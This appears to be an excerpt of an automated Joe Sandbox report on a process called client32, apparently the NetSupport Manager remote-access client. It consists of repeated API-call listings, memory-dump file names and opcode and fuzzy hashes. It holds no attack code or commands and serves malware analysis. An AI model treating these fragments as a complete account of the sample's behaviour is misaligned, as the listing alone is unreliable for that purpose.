                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                • API String ID: 1136984157-1986719024
                                                                                                                • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                                                • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                                                                • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                                                • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                                                  • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                                                                • _malloc.LIBCMT ref: 110491DD
                                                                                                                • _memmove.LIBCMT ref: 110491EA
                                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,0002045A,?,00000002,00001388,?), ref: 11049224
                                                                                                                • _free.LIBCMT ref: 1104922B
                                                                                                                  • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                                                  • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                                                  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                                                  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                                                  • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 176360892-0
                                                                                                                • Opcode ID: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                                                                • Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
                                                                                                                • Opcode Fuzzy Hash: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                                                                • Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
                                                                                                                APIs
                                                                                                                • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                                                • SetRect.USER32(?,?,?,?,?), ref: 111430A9
                                                                                                                • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Color$RectText
                                                                                                                • String ID:
                                                                                                                • API String ID: 4034337308-0
                                                                                                                • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                                                • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                                                                • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                                                • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                                                                APIs
                                                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AtomDeleteGlobal$LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 964255742-0
                                                                                                                • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                                • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                                                • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                                • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                                                APIs
                                                                                                                • _calloc.LIBCMT ref: 1103B162
                                                                                                                • _free.LIBCMT ref: 1103B25B
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                                                                • String ID: CLTCONN.CPP
                                                                                                                • API String ID: 183652615-2872349640
                                                                                                                • Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                                                • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                                                                • Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                                                • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 110AD1E3
                                                                                                                  • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
                                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                                                                Strings
                                                                                                                • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FreeLoad_memset
                                                                                                                • String ID: winscard.dll is NOT valid!!!
                                                                                                                • API String ID: 212038770-1939809930
                                                                                                                • Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                                                • Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
                                                                                                                • Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                                                • Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                  • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
                                                                                                                  • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                                                                • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                                                                • _memset.LIBCMT ref: 11039216
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ItemText$Window$ObjectRectShow_memset
                                                                                                                • String ID: 124406
                                                                                                                • API String ID: 3037201586-3922861981
                                                                                                                • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                                                • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                                                                • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                                                • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                • m_hWnd, xrefs: 11015049
                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                • API String ID: 819365019-3966830984
                                                                                                                • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                                                • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                                                                • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                                                • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                                                                APIs
                                                                                                                • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                                                • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                                                • API String ID: 1134434899-3115850912
                                                                                                                • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                                • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                                                • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                                • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                • m_hWnd, xrefs: 110151F9
                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
